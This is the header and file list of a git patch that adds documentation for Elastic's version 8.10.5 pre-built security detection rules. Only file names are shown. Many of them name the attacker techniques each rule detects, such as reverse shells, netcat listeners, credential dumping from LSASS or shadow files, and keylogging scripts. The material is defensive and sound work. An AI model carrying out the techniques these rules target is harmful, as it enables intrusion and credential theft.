From b4addb97c47f59a6774d2060e1095f120e80e1d0 Mon Sep 17 00:00:00 2001 
From: protections machine <72879786+protectionsmachine@users.noreply.github.com>
Date: Wed, 25 Oct 2023 15:20:31 +0200
Subject: [PATCH] [Detection Rules] Adding Documents for v8.10.5 Pre-Built Detection Rules (#4099)

* Update latest docs

* fixed links; updated downloadable updates description

* removed references to deprecated rules

* removed 'potential-dll-sideloading-via-trusted-microsoft-programs'

* removed deprecations from summary

---------

Co-authored-by: terrancedejesus <terrance.dejesus@elastic.co>
---
 ...l-process-id-or-lock-file-created.asciidoc | 122 +++
 ...ess-to-a-sensitive-ldap-attribute.asciidoc | 130 +++
 ...covery-command-via-system-account.asciidoc | 114 +++
 ...5-account-password-reset-remotely.asciidoc |  89 ++
 ...-hidden-file-attribute-via-attrib.asciidoc | 146 +++
 ...le-8-10-5-adfind-command-activity.asciidoc | 144 +++
 ...ule-8-10-5-adminsdholder-backdoor.asciidoc |  74 ++
 ...insdholder-sdprop-exclusion-added.asciidoc | 121 +++
 ...e-8-10-5-adobe-hijack-persistence.asciidoc | 132 +++
 ...t-to-disable-iptables-or-firewall.asciidoc |  78 ++
 ...attempt-to-disable-syslog-service.asciidoc |  70 ++
 ...base32-encoding-decoding-activity.asciidoc |  67 ++
 ...5-bash-shell-profile-modification.asciidoc |  80 ++
 ...uted-from-shared-memory-directory.asciidoc |  69 ++
 ...-10-5-bpf-filter-applied-using-tc.asciidoc |  69 ++
 ...-10-5-bypass-uac-via-event-viewer.asciidoc | 147 +++
 ...rule-8-10-5-chkconfig-service-add.asciidoc |  72 ++
 ...-clearing-windows-console-history.asciidoc | 126 +++
 ...-10-5-clearing-windows-event-logs.asciidoc | 120 +++
 ...strike-command-and-control-beacon.asciidoc |  84 ++
 ...icy-modification-through-registry.asciidoc | 132 +++
 ...-execution-via-solarwinds-process.asciidoc | 103 ++
 ...ell-activity-started-via-rundll32.asciidoc | 106 +++
 ...-component-object-model-hijacking.asciidoc | 177 ++++
 ...wned-by-suspicious-parent-process.asciidoc | 145 +++
 ...n-to-commonly-abused-web-services.asciidoc | 207 ++++
 ...on-to-external-network-via-telnet.asciidoc |  70 ++
 ...on-to-internal-network-via-telnet.asciidoc |  70 ++
 ...s-and-directories-via-commandline.asciidoc |  71 ++
 ...tion-of-hidden-shared-object-file.asciidoc |  66 ++
 ...new-gpo-scheduled-task-or-service.asciidoc |  91 ++
 ...ged-by-previously-unknown-process.asciidoc |  97 ++
 ...ting-backup-catalogs-with-wbadmin.asciidoc | 115 +++
 ...ell-via-suspicious-parent-process.asciidoc |  95 ++
 ...ecurity-logs-using-built-in-tools.asciidoc | 132 +++
 ...control-via-registry-modification.asciidoc | 159 ++++
 ...-security-settings-via-powershell.asciidoc | 128 +++
 ...s-over-https-enabled-via-registry.asciidoc |  84 ++
 ...t-rule-8-10-5-dynamic-linker-copy.asciidoc |  69 ++
 ...ncrypting-files-with-winrar-or-7z.asciidoc | 124 +++
 ...0-5-enumeration-of-kernel-modules.asciidoc |  63 ++
 ...le-8-10-5-esxi-discovery-via-find.asciidoc |  62 ++
 ...le-8-10-5-esxi-discovery-via-grep.asciidoc |  63 ++
 ...-timestomping-using-touch-command.asciidoc |  66 ++
 ...nge-mailbox-export-via-powershell.asciidoc | 128 +++
 ...ssql-xp-cmdshell-stored-procedure.asciidoc | 132 +++
 ...execution-via-tsclient-mountpoint.asciidoc |  77 ++
 ...-expired-or-revoked-driver-loaded.asciidoc |  75 ++
 ...g-exchange-mailbox-via-powershell.asciidoc | 137 +++
 ...-deletion-in-suspicious-directory.asciidoc |  72 ++
 ...le-8-10-5-file-deletion-via-shred.asciidoc |  64 ++
 ...0-5-file-made-immutable-by-chattr.asciidoc |  68 ++
 ...odification-in-writable-directory.asciidoc |  62 ++
 ...r-listener-established-via-netcat.asciidoc | 133 +++
 ...0-5-first-time-seen-driver-loaded.asciidoc | 144 +++
 ...me-seen-account-performing-dcsync.asciidoc | 134 +++
 ...fbaked-command-and-control-beacon.asciidoc |  84 ++
 ...gh-number-of-process-terminations.asciidoc | 103 ++
 ...t-rule-8-10-5-hosts-file-modified.asciidoc | 125 +++
 ...ule-8-10-5-hping-process-activity.asciidoc |  65 ++
 ...-file-execution-options-injection.asciidoc |  88 ++
 ...to-an-unsecure-elasticsearch-node.asciidoc |  71 ++
 ...ng-dcom-lateral-movement-with-mmc.asciidoc |  86 ++
 ...execution-via-powershell-remoting.asciidoc |  84 ++
 ...tion-of-security-support-provider.asciidoc |  91 ++
 ...ractive-terminal-spawned-via-perl.asciidoc |  63 ++
 ...ctive-terminal-spawned-via-python.asciidoc |  71 ++
 ...-authentication-disabled-for-user.asciidoc | 127 +++
 ...load-or-unload-via-kexec-detected.asciidoc |  90 ++
 ...0-5-kernel-module-load-via-insmod.asciidoc |  69 ++
 ...rule-8-10-5-kernel-module-removal.asciidoc |  81 ++
 ...teral-movement-via-startup-folder.asciidoc |  95 ++
 ...ux-init-pid-1-secret-dump-via-gdb.asciidoc |  67 ++
 ...shell-breakout-via-linux-binary-s.asciidoc | 193 ++++
 ...ux-user-added-to-privileged-group.asciidoc | 128 +++
 ...count-tokenfilter-policy-disabled.asciidoc |  87 ++
 ...ss-process-access-via-windows-api.asciidoc | 100 ++
 ...uest-predicted-to-be-a-dga-domain.asciidoc |  77 ++
 ...with-a-high-dga-probability-score.asciidoc |  77 ++
 ...redicted-to-be-malicious-activity.asciidoc |  78 ++
 ...-high-malicious-probability-score.asciidoc |  79 ++
 ...using-a-known-sunburst-dns-domain.asciidoc |  77 ++
 ...engine-started-an-unusual-process.asciidoc |  85 ++
 ...ngine-started-by-a-script-process.asciidoc |  89 ++
 ...ld-engine-using-an-alternate-name.asciidoc | 135 +++
 ...-um-spawning-suspicious-processes.asciidoc |  92 ++
 ...erver-um-writing-suspicious-files.asciidoc | 104 ++
 ...ker-spawning-suspicious-processes.asciidoc |  95 ++
 ...rosoft-windows-defender-tampering.asciidoc | 146 +++
 ...cation-of-amsienable-registry-key.asciidoc | 137 +++
 ...amic-linker-preload-shared-object.asciidoc |  69 ++
 ...-modification-of-openssh-binaries.asciidoc | 101 ++
 ...ntication-module-or-configuration.asciidoc | 101 ++
 ...on-of-the-mspkiaccountcredentials.asciidoc |  76 ++
 ...espace-manipulation-using-unshare.asciidoc |  68 ++
 ...t-listener-established-via-rlwrap.asciidoc |  66 ++
 ...network-activity-detected-via-cat.asciidoc |  67 ++
 ...-via-recently-compiled-executable.asciidoc |  76 ++
 ...nnection-via-registration-utility.asciidoc | 150 +++
 ...work-connection-via-signed-binary.asciidoc | 134 +++
 ...oweddeviceid-added-via-powershell.asciidoc |  92 ++
 ...ted-by-previously-unknown-process.asciidoc |  94 ++
 ...-8-10-5-new-systemd-timer-created.asciidoc | 140 +++
 ...ule-8-10-5-nping-process-activity.asciidoc |  64 ++
 ...-ntds-or-sam-database-file-copied.asciidoc |  91 ++
 ...sessionpipe-registry-modification.asciidoc |  81 ++
 ...uled-task-activity-via-powershell.asciidoc |  78 ++
 ...-10-5-parent-process-pid-spoofing.asciidoc | 116 +++
 ...tence-via-hidden-run-key-detected.asciidoc | 109 +++
 ...ript-or-desktop-file-modification.asciidoc |  80 ++
 ...tence-via-microsoft-office-addins.asciidoc |  84 ++
 ...ersistence-via-powershell-profile.asciidoc |  87 ++
 ...ycontroller-scheduled-task-hijack.asciidoc | 105 +++
 ...pdate-orchestrator-service-hijack.asciidoc | 158 ++++
 ...stence-via-wmi-event-subscription.asciidoc |  89 ++
 ...0-5-port-forwarding-rule-addition.asciidoc | 125 +++
 ...-dga-command-and-control-behavior.asciidoc |  82 ++
 ...ial-code-execution-via-postgresql.asciidoc |  69 ++
 ...tial-credential-access-via-dcsync.asciidoc | 150 +++
 ...tial-access-via-lsass-memory-dump.asciidoc |  91 ++
 ...cess-via-renamed-com-services-dll.asciidoc |  93 ++
 ...ess-via-trusted-developer-utility.asciidoc | 150 +++
 ...tial-access-via-windows-utilities.asciidoc | 159 ++++
 ...-curl-cve-2023-38545-exploitation.asciidoc |  68 ++
 ...ty-to-an-unusual-destination-port.asciidoc |  58 ++
 ...activity-to-an-unusual-ip-address.asciidoc |  58 ++
 ...n-activity-to-an-unusual-iso-code.asciidoc |  58 ++
 ...ion-activity-to-an-unusual-region.asciidoc |  58 ++
 ...tential-defense-evasion-via-proot.asciidoc |  61 ++
 ...ule-8-10-5-potential-dga-activity.asciidoc |  58 ++
 ...5-potential-disabling-of-apparmor.asciidoc |  66 ++
 ...-5-potential-disabling-of-selinux.asciidoc |  66 ++
 ...ng-via-trusted-microsoft-programs.asciidoc |  89 ++
 ...ential-dns-tunneling-via-nslookup.asciidoc | 115 +++
 ...al-linux-ssh-brute-force-detected.asciidoc | 118 +++
 ...tential-file-transfer-via-certreq.asciidoc |  84 ++
 ...-hidden-process-via-mount-hidepid.asciidoc |  62 ++
 ...al-linux-ssh-brute-force-detected.asciidoc | 114 +++
 ...teral-tool-transfer-via-smb-share.asciidoc | 123 +++
 ...ux-backdoor-user-account-creation.asciidoc | 123 +++
 ...ntial-dumping-via-proc-filesystem.asciidoc |  76 ++
 ...x-credential-dumping-via-unshadow.asciidoc |  68 ++
 ...otential-linux-hack-tool-launched.asciidoc |  73 ++
 ...ocal-account-brute-force-detected.asciidoc |  67 ++
 ...ransomware-note-creation-detected.asciidoc |  67 ++
 ...-tunneling-and-or-port-forwarding.asciidoc |  77 ++
 ...tential-local-ntlm-relay-via-http.asciidoc |  87 ++
 ...asquerading-as-communication-apps.asciidoc | 134 +++
 ...tential-meterpreter-reverse-shell.asciidoc |  81 ++
 ...5-potential-network-scan-detected.asciidoc |  74 ++
 ...l-network-scan-executed-from-host.asciidoc |  60 ++
 ...-potential-network-sweep-detected.asciidoc |  75 ++
 ...-non-standard-port-ssh-connection.asciidoc |  70 ++
 ...openssh-backdoor-logging-activity.asciidoc | 103 ++
 ...rsistence-through-init-d-detected.asciidoc | 138 +++
 ...rough-motd-file-creation-detected.asciidoc | 133 +++
 ...ence-through-run-control-detected.asciidoc | 141 +++
 ...ce-via-time-provider-modification.asciidoc |  85 ++
 ...rint-processor-registration-abuse.asciidoc |  95 ++
 ...on-through-writable-docker-socket.asciidoc |  67 ++
 ...on-via-container-misconfiguration.asciidoc |  67 ++
 ...lege-escalation-via-cve-2023-4911.asciidoc |  64 ++
 ...alation-via-installerfiletakeover.asciidoc | 140 +++
 ...rivilege-escalation-via-overlayfs.asciidoc |  67 ++
 ...l-privilege-escalation-via-pkexec.asciidoc |  77 ++
 ...-escalation-via-python-cap-setuid.asciidoc |  71 ++
 ...-via-recently-compiled-executable.asciidoc |  68 ++
 ...tion-via-uid-int-max-bug-detected.asciidoc |  64 ++
 ...ation-via-samaccountname-spoofing.asciidoc |  96 ++
 ...-process-injection-via-powershell.asciidoc | 143 +++
 ...tocol-tunneling-via-chisel-client.asciidoc |  70 ++
 ...tocol-tunneling-via-chisel-server.asciidoc |  70 ++
 ...-protocol-tunneling-via-earthworm.asciidoc |  66 ++
 ...-pspy-process-monitoring-detected.asciidoc |  67 ++
 ...ote-code-execution-via-web-server.asciidoc | 154 +++
 ...remote-desktop-shadowing-activity.asciidoc |  93 ++
 ...remote-desktop-tunneling-detected.asciidoc | 122 +++
 ...verse-shell-activity-via-terminal.asciidoc | 113 +++
 ...erse-shell-via-background-process.asciidoc |  73 ++
 ...-potential-reverse-shell-via-java.asciidoc |  81 ++
 ...verse-shell-via-suspicious-binary.asciidoc |  90 ++
 ...hell-via-suspicious-child-process.asciidoc |  97 ++
 ...5-potential-reverse-shell-via-udp.asciidoc |  86 ++
 ...le-8-10-5-potential-reverse-shell.asciidoc |  80 ++
 ...file-deletion-via-sdelete-utility.asciidoc | 116 +++
 ...e-read-via-command-line-utilities.asciidoc |  79 ++
 ...l-via-wildcard-injection-detected.asciidoc |  77 ++
 ...ential-ssh-it-ssh-worm-downloaded.asciidoc |  78 ++
 ...x-ftp-brute-force-attack-detected.asciidoc |  73 ++
 ...x-rdp-brute-force-attack-detected.asciidoc |  71 ++
 ...successful-ssh-brute-force-attack.asciidoc | 109 +++
 ...potential-sudo-hijacking-detected.asciidoc |  77 ++
 ...ege-escalation-via-cve-2019-14287.asciidoc |  63 ++
 ...anipulation-via-process-injection.asciidoc |  77 ++
 ...icious-debugfs-root-device-access.asciidoc |  69 ++
 ...l-syn-based-network-scan-detected.asciidoc |  74 ++
 ...s-via-wildcard-injection-detected.asciidoc |  77 ++
 ...-upgrade-of-non-interactive-shell.asciidoc |  69 ++
 ...indows-error-manager-masquerading.asciidoc | 131 +++
 ...10-5-powershell-keylogging-script.asciidoc | 138 +++
 ...ell-script-block-logging-disabled.asciidoc | 125 +++
 ...wershell-share-enumeration-script.asciidoc | 141 +++
 ...ery-related-windows-api-functions.asciidoc | 177 ++++
 ...t-with-audio-capture-capabilities.asciidoc | 133 +++
 ...ion-by-the-microsoft-build-engine.asciidoc |  77 ++
 ...-started-from-process-id-pid-file.asciidoc |  84 ++
 ...-termination-followed-by-deletion.asciidoc | 141 +++
 ...-8-10-5-psexec-network-connection.asciidoc | 134 +++
 ...e-8-10-5-rdp-enabled-via-registry.asciidoc | 128 +++
 ...istry-persistence-via-appcert-dll.asciidoc |  93 ++
 ...istry-persistence-via-appinit-dll.asciidoc | 146 +++
 ...-remote-execution-via-file-shares.asciidoc | 125 +++
 ...e-download-via-script-interpreter.asciidoc | 136 +++
 ...-task-created-by-a-windows-script.asciidoc | 101 ++
 ...d-task-execution-at-scale-via-gpo.asciidoc | 131 +++
 ...cheduled-tasks-at-command-enabled.asciidoc |  94 ++
 ...urity-software-discovery-via-grep.asciidoc | 145 +++
 ...-10-5-sensitive-files-compression.asciidoc | 112 +++
 ...ationprivilege-assigned-to-a-user.asciidoc | 119 +++
 ...ol-spawned-via-script-interpreter.asciidoc | 165 ++++
 ...tcap-setuid-setgid-capability-set.asciidoc |  68 ++
 ...ged-by-previously-unknown-process.asciidoc |  70 ++
 ...s-disabling-services-via-registry.asciidoc | 106 +++
 ...to-an-external-device-via-airdrop.asciidoc |  58 ++
 ...-bytes-sent-to-an-external-device.asciidoc |  58 ++
 ...authorized-keys-file-modification.asciidoc | 100 ++
 ...-persistence-via-unsigned-process.asciidoc | 153 +++
 ...sudo-command-enumeration-detected.asciidoc |  62 ++
 ...-8-10-5-sudoers-file-modification.asciidoc |  65 ++
 ...5-suid-sguid-enumeration-detected.asciidoc |  82 ++
 ...-suspicious-cmd-execution-via-wmi.asciidoc |  81 ++
 ...racted-or-decompressed-via-funzip.asciidoc |  83 ++
 ...ta-encryption-via-openssl-utility.asciidoc |  68 ++
 ...rsistence-or-privilege-escalation.asciidoc | 168 ++++
 ...-endpoint-security-parent-process.asciidoc |  82 ++
 ...s-execution-from-a-mounted-device.asciidoc | 105 +++
 ...ious-execution-via-scheduled-task.asciidoc | 123 +++
 ...suspicious-explorer-child-process.asciidoc | 121 +++
 ...us-file-changes-activity-detected.asciidoc |  64 ++
 ...e-creation-in-etc-for-persistence.asciidoc | 114 +++
 ...-load-taskschd-dll-from-ms-office.asciidoc |  94 ++
 ...icious-imagepath-service-creation.asciidoc |  79 ++
 ...0-5-suspicious-java-child-process.asciidoc | 110 +++
 ...ious-managed-code-hosting-process.asciidoc |  74 ++
 ...ous-mining-process-creation-event.asciidoc |  67 ++
 ...uspicious-ms-office-child-process.asciidoc | 157 +++
 ...spicious-ms-outlook-child-process.asciidoc | 156 +++
 ...5-suspicious-net-code-compilation.asciidoc |  90 ++
 ...ous-net-reflection-via-powershell.asciidoc | 166 ++++
 ...-by-previously-unknown-executable.asciidoc |  80 ++
 ...spicious-pdf-reader-child-process.asciidoc | 143 +++
 ...able-encoded-in-powershell-script.asciidoc | 143 +++
 ...ess-access-via-direct-system-call.asciidoc | 152 +++
 ...ion-via-renamed-psexec-executable.asciidoc | 119 +++
 ...rocess-spawned-from-motd-detected.asciidoc | 152 +++
 ...picious-rdp-activex-client-loaded.asciidoc |  93 ++
 ...stry-access-via-sebackupprivilege.asciidoc | 126 +++
 ...suspicious-renaming-of-esxi-files.asciidoc |  67 ++
 ...-renaming-of-esxi-index-html-file.asciidoc |  66 ++
 ...uspicious-script-object-execution.asciidoc |  85 ++
 ...startup-shell-folder-modification.asciidoc | 152 +++
 ...-suspicious-symbolic-link-created.asciidoc |  92 ++
 ...-by-previously-unknown-executable.asciidoc |  73 ++
 ...cious-termination-of-esxi-process.asciidoc |  62 ++
 ...-utility-launched-via-proxychains.asciidoc |  65 ++
 ...suspicious-werfault-child-process.asciidoc | 109 +++
 ...process-cluster-spawned-by-a-host.asciidoc |  59 ++
 ...uster-spawned-by-a-parent-process.asciidoc |  61 ++
 ...process-cluster-spawned-by-a-user.asciidoc |  61 ++
 ...picious-wmic-xsl-script-execution.asciidoc |  76 ++
 ...0-5-suspicious-zoom-child-process.asciidoc | 136 +++
 ...bolic-link-to-shadow-copy-created.asciidoc | 146 +++
 ...-or-moved-to-suspicious-directory.asciidoc |  93 ++
 ...e-8-10-5-system-log-file-deletion.asciidoc |  83 ++
 ...8-10-5-system-shells-via-services.asciidoc | 137 +++
 ...mporarily-scheduled-task-creation.asciidoc |  81 ++
 ...es-deleted-via-unexpected-process.asciidoc | 131 +++
 ...nternet-explorer-add-on-installer.asciidoc | 108 +++
 ...eged-ifileoperation-com-interface.asciidoc | 103 ++
 ...ia-windows-directory-masquerading.asciidoc | 151 +++
 ...ademanager-elevated-com-interface.asciidoc | 106 +++
 ...diskcleanup-scheduled-task-hijack.asciidoc | 105 +++
 ...icmluautil-elevated-com-interface.asciidoc | 104 ++
 ...a-windows-firewall-snap-in-hijack.asciidoc | 154 +++
 ...-5-unsigned-dll-loaded-by-svchost.asciidoc | 179 ++++
 ...-loading-from-a-suspicious-folder.asciidoc | 161 ++++
 ...le-8-10-5-untrusted-driver-loaded.asciidoc | 135 +++
 ...-unusual-child-process-of-dns-exe.asciidoc | 113 +++
 ...tion-by-a-system-critical-process.asciidoc | 139 +++
 ...sual-file-modification-by-dns-exe.asciidoc |  83 ++
 ...vity-from-a-windows-system-binary.asciidoc | 189 ++++
 ...persistence-via-services-registry.asciidoc |  94 ++
 ...unusual-process-spawned-by-a-host.asciidoc |  61 ++
 ...ocess-spawned-by-a-parent-process.asciidoc |  61 ++
 ...unusual-process-spawned-by-a-user.asciidoc |  61 ++
 ...riting-data-to-an-external-device.asciidoc |  58 ++
 ...t-child-process-childless-service.asciidoc | 107 +++
 ...user-privilege-enumeration-via-id.asciidoc |  62 ++
 ...-5-virtual-machine-fingerprinting.asciidoc |  68 ++
 ...adow-copy-deletion-via-powershell.asciidoc | 148 +++
 ...ume-shadow-copy-deletion-via-wmic.asciidoc | 138 +++
 ...ess-child-of-common-web-processes.asciidoc | 157 +++
 ...isabled-via-registry-modification.asciidoc | 142 +++
 ...-firewall-disabled-via-powershell.asciidoc | 129 +++
 ...ndows-script-executing-powershell.asciidoc | 142 +++
 ...rpreter-executing-process-via-wmi.asciidoc | 112 +++
 ...0-5-wmi-incoming-lateral-movement.asciidoc |  89 ++
 .../prebuilt-rules-8-10-5-appendix.asciidoc   | 313 ++++++
 .../prebuilt-rules-8-10-5-summary.asciidoc    | 626 ++++++++++++
 .../prebuilt-rules-changelog.asciidoc         |   4 -
 ...ebuilt-rules-downloadable-updates.asciidoc |  10 +
 .../prebuilt-rules-reference.asciidoc         | 892 ++++++++++--------
 .../prebuilt-rules/rule-desc-index.asciidoc   |  54 +-
 ...l-process-id-or-lock-file-created.asciidoc |   5 +-
 ...ess-to-a-sensitive-ldap-attribute.asciidoc |  23 +-
 ...covery-command-via-system-account.asciidoc |  15 +-
 .../account-password-reset-remotely.asciidoc  |  11 +-
 ...-hidden-file-attribute-via-attrib.asciidoc |  11 +-
 .../adfind-command-activity.asciidoc          |   6 +-
 ...vileges-assigned-to-an-okta-group.asciidoc |   2 +-
 ...tor-role-assigned-to-an-okta-user.asciidoc |   2 +-
 .../adminsdholder-backdoor.asciidoc           |  14 +-
 ...insdholder-sdprop-exclusion-added.asciidoc |  14 +-
 .../adobe-hijack-persistence.asciidoc         |   6 +-
 ...chive-file-with-unusual-extension.asciidoc |  83 ++
 .../at-exe-command-lateral-movement.asciidoc  |   6 +-
 .../attempt-to-create-okta-api-token.asciidoc |   2 +-
 ...to-deactivate-an-okta-application.asciidoc |   2 +-
 ...o-deactivate-an-okta-network-zone.asciidoc |   2 +-
 ...to-deactivate-an-okta-policy-rule.asciidoc |   2 +-
 ...empt-to-deactivate-an-okta-policy.asciidoc |   2 +-
 ...vate-mfa-for-an-okta-user-account.asciidoc |   2 +-
 ...mpt-to-delete-an-okta-application.asciidoc |   2 +-
 ...pt-to-delete-an-okta-network-zone.asciidoc |   2 +-
 ...mpt-to-delete-an-okta-policy-rule.asciidoc |   2 +-
 .../attempt-to-delete-an-okta-policy.asciidoc |   2 +-
 ...t-to-disable-iptables-or-firewall.asciidoc |   2 +-
 ...attempt-to-disable-syslog-service.asciidoc |   2 +-
 ...mpt-to-modify-an-okta-application.asciidoc |   2 +-
 ...pt-to-modify-an-okta-network-zone.asciidoc |   2 +-
 ...mpt-to-modify-an-okta-policy-rule.asciidoc |   2 +-
 .../attempt-to-modify-an-okta-policy.asciidoc |   2 +-
 ...-factors-for-an-okta-user-account.asciidoc |   2 +-
 .../attempt-to-revoke-okta-api-token.asciidoc |   2 +-
 .../attempted-bypass-of-okta-mfa.asciidoc     |   2 +-
 ...-brute-force-an-okta-user-account.asciidoc |   2 +-
 .../aws-cloudtrail-log-created.asciidoc       |   2 +-
 .../aws-cloudtrail-log-deleted.asciidoc       |   2 +-
 .../aws-cloudtrail-log-suspended.asciidoc     |   2 +-
 .../aws-cloudtrail-log-updated.asciidoc       |   2 +-
 .../aws-cloudwatch-alarm-deletion.asciidoc    |   2 +-
 ...aws-cloudwatch-log-group-deletion.asciidoc |   2 +-
 ...ws-cloudwatch-log-stream-deletion.asciidoc |   2 +-
 .../aws-config-resource-deletion.asciidoc     |   2 +-
 ...ws-configuration-recorder-stopped.asciidoc |   2 +-
 ...letion-of-rds-instance-or-cluster.asciidoc |   2 +-
 .../aws-ec2-encryption-disabled.asciidoc      |   2 +-
 ...l-network-packet-capture-detected.asciidoc |   2 +-
 ...work-access-control-list-creation.asciidoc |   2 +-
 ...work-access-control-list-deletion.asciidoc |   2 +-
 .../aws-ec2-snapshot-activity.asciidoc        |   2 +-
 .../aws-ec2-vm-export-failure.asciidoc        |   2 +-
 ...-efs-file-system-or-mount-deleted.asciidoc |   2 +-
 ...lasticache-security-group-created.asciidoc |   2 +-
 ...ecurity-group-modified-or-deleted.asciidoc |   2 +-
 ...ntbridge-rule-disabled-or-deleted.asciidoc |   2 +-
 .../aws-execution-via-system-manager.asciidoc |   2 +-
 .../aws-guardduty-detector-deletion.asciidoc  |   2 +-
 ...aws-iam-assume-role-policy-update.asciidoc |   2 +-
 ...brute-force-of-assume-role-policy.asciidoc |   2 +-
 ...ws-iam-deactivation-of-mfa-device.asciidoc |   2 +-
 .../aws-iam-group-creation.asciidoc           |   2 +-
 .../aws-iam-group-deletion.asciidoc           |   2 +-
 ...s-iam-password-recovery-requested.asciidoc |   2 +-
 .../aws-iam-user-addition-to-group.asciidoc   |   2 +-
 ...isabled-or-scheduled-for-deletion.asciidoc |   2 +-
 ...brute-force-of-root-user-identity.asciidoc |   2 +-
 ...aws-management-console-root-login.asciidoc |   2 +-
 .../aws-rds-cluster-creation.asciidoc         |   2 +-
 ...aws-rds-instance-cluster-stoppage.asciidoc |   2 +-
 .../aws-rds-instance-creation.asciidoc        |   2 +-
 .../aws-rds-security-group-creation.asciidoc  |   2 +-
 .../aws-rds-security-group-deletion.asciidoc  |   2 +-
 .../aws-rds-snapshot-export.asciidoc          |   2 +-
 .../aws-rds-snapshot-restored.asciidoc        |   2 +-
 .../aws-redshift-cluster-creation.asciidoc    |   2 +-
 .../aws-root-login-without-mfa.asciidoc       |   2 +-
 ...-53-domain-transfer-lock-disabled.asciidoc |   2 +-
 ...in-transferred-to-another-account.asciidoc |   2 +-
 .../aws-route-table-created.asciidoc          |   2 +-
 ...s-route-table-modified-or-deleted.asciidoc |   2 +-
 ...hosted-zone-associated-with-a-vpc.asciidoc |   2 +-
 ...-s3-bucket-configuration-deletion.asciidoc |   2 +-
 .../rule-details/aws-saml-activity.asciidoc   |   2 +-
 ...up-configuration-change-detection.asciidoc |   2 +-
 ...oken-service-sts-assumerole-usage.asciidoc |   2 +-
 .../aws-sts-getsessiontoken-abuse.asciidoc    |   2 +-
 .../aws-vpc-flow-logs-deletion.asciidoc       |   2 +-
 ...-waf-access-control-list-deletion.asciidoc |   2 +-
 ...s-waf-rule-or-rule-group-deletion.asciidoc |   2 +-
 ...base32-encoding-decoding-activity.asciidoc |   2 +-
 .../bash-shell-profile-modification.asciidoc  |  20 +-
 .../binary-content-copy-via-cmd-exe.asciidoc  |  15 +-
 ...uted-from-shared-memory-directory.asciidoc |   2 +-
 .../bpf-filter-applied-using-tc.asciidoc      |   2 +-
 .../bypass-uac-via-event-viewer.asciidoc      |  15 +-
 .../bypass-uac-via-sdclt.asciidoc             |  13 +
 .../chkconfig-service-add.asciidoc            |   2 +-
 .../clearing-windows-console-history.asciidoc |  15 +-
 .../clearing-windows-event-logs.asciidoc      |   6 +-
 ...strike-command-and-control-beacon.asciidoc |   8 +-
 ...icy-modification-through-registry.asciidoc |   6 +-
 ...-execution-via-solarwinds-process.asciidoc |  11 +-
 ...ell-activity-started-via-rundll32.asciidoc |  15 +-
 .../component-object-model-hijacking.asciidoc |  24 +-
 ...wned-by-suspicious-parent-process.asciidoc |  20 +-
 ...n-to-commonly-abused-web-services.asciidoc |  10 +-
 ...on-to-external-network-via-telnet.asciidoc |   2 +-
 ...on-to-internal-network-via-telnet.asciidoc |   2 +-
 ...s-and-directories-via-commandline.asciidoc |  43 +-
 ...tion-of-hidden-shared-object-file.asciidoc |  43 +-
 ...new-gpo-scheduled-task-or-service.asciidoc |  15 +-
 ...ged-by-previously-unknown-process.asciidoc |   4 +-
 .../delayed-execution-via-ping.asciidoc       | 149 +++
 ...ting-backup-catalogs-with-wbadmin.asciidoc |   6 +-
 ...ell-via-suspicious-parent-process.asciidoc |  95 ++
 ...ecurity-logs-using-built-in-tools.asciidoc |   6 +-
 ...control-via-registry-modification.asciidoc |  14 +-
 ...-security-settings-via-powershell.asciidoc |  15 +-
 ...s-over-https-enabled-via-registry.asciidoc |   6 +-
 .../rule-details/dynamic-linker-copy.asciidoc |   2 +-
 ...ncrypting-files-with-winrar-or-7z.asciidoc |   6 +-
 ...ration-of-kernel-modules-via-proc.asciidoc |  11 +-
 .../enumeration-of-kernel-modules.asciidoc    |   5 +-
 .../esxi-discovery-via-find.asciidoc          |   2 +-
 .../esxi-discovery-via-grep.asciidoc          |   2 +-
 ...-timestomping-using-touch-command.asciidoc |   2 +-
 ...nge-mailbox-export-via-powershell.asciidoc |   6 +-
 ...table-file-with-unusual-extension.asciidoc |  80 ++
 ...ble-media-with-network-connection.asciidoc |  68 ++
 .../execution-of-an-unsigned-service.asciidoc |  15 +-
 ...a-microsoft-dotnet-clickonce-host.asciidoc |  71 ++
 ...isualstudio-pre-post-build-events.asciidoc | 108 +++
 ...ssql-xp-cmdshell-stored-procedure.asciidoc |   6 +-
 ...execution-via-tsclient-mountpoint.asciidoc |   6 +-
 .../expired-or-revoked-driver-loaded.asciidoc |  16 +-
 ...g-exchange-mailbox-via-powershell.asciidoc |  15 +-
 ...-deletion-in-suspicious-directory.asciidoc |   2 +-
 .../file-deletion-via-shred.asciidoc          |   2 +-
 .../file-made-immutable-by-chattr.asciidoc    |  43 +-
 ...odification-in-writable-directory.asciidoc |  12 +-
 ...ged-in-root-folder-of-recycle-bin.asciidoc |   6 +-
 ...r-listener-established-via-netcat.asciidoc |   3 +-
 ...value-accessed-in-secrets-manager.asciidoc |   2 +-
 .../first-time-seen-driver-loaded.asciidoc    |  11 +-
 ...me-seen-account-performing-dcsync.asciidoc |  15 +-
 ...fbaked-command-and-control-beacon.asciidoc |  10 +-
 ...password-reset-or-unlock-attempts.asciidoc |   2 +-
 ...gh-number-of-process-terminations.asciidoc |   3 +-
 .../rule-details/hosts-file-modified.asciidoc |   8 +-
 .../hping-process-activity.asciidoc           |   2 +-
 ...-file-execution-options-injection.asciidoc |  11 +-
 ...age-loaded-with-invalid-signature.asciidoc |  70 ++
 ...to-an-unsecure-elasticsearch-node.asciidoc |   6 +-
 ...ng-dcom-lateral-movement-with-mmc.asciidoc |  15 +-
 ...execution-via-powershell-remoting.asciidoc |  15 +-
 ...tion-of-security-support-provider.asciidoc |  11 +-
 ...ractive-terminal-spawned-via-perl.asciidoc |   2 +-
 ...ctive-terminal-spawned-via-python.asciidoc |  10 +-
 ...-authentication-disabled-for-user.asciidoc |  24 +-
 ...load-or-unload-via-kexec-detected.asciidoc |   2 +-
 .../kernel-module-load-via-insmod.asciidoc    |   5 +-
 .../kernel-module-removal.asciidoc            |   2 +-
 .../rule-details/kirbi-file-creation.asciidoc |  14 +-
 ...teral-movement-via-startup-folder.asciidoc |   6 +-
 ...ux-init-pid-1-secret-dump-via-gdb.asciidoc |   2 +-
 ...shell-breakout-via-linux-binary-s.asciidoc |  36 +-
 ...ux-user-added-to-privileged-group.asciidoc |   3 +-
 ...count-tokenfilter-policy-disabled.asciidoc |  26 +-
 ...ss-process-access-via-windows-api.asciidoc |  11 +-
 ...uest-predicted-to-be-a-dga-domain.asciidoc |  77 ++
 ...with-a-high-dga-probability-score.asciidoc |  77 ++
 ...redicted-to-be-malicious-activity.asciidoc |  78 ++
 ...-high-malicious-probability-score.asciidoc |  79 ++
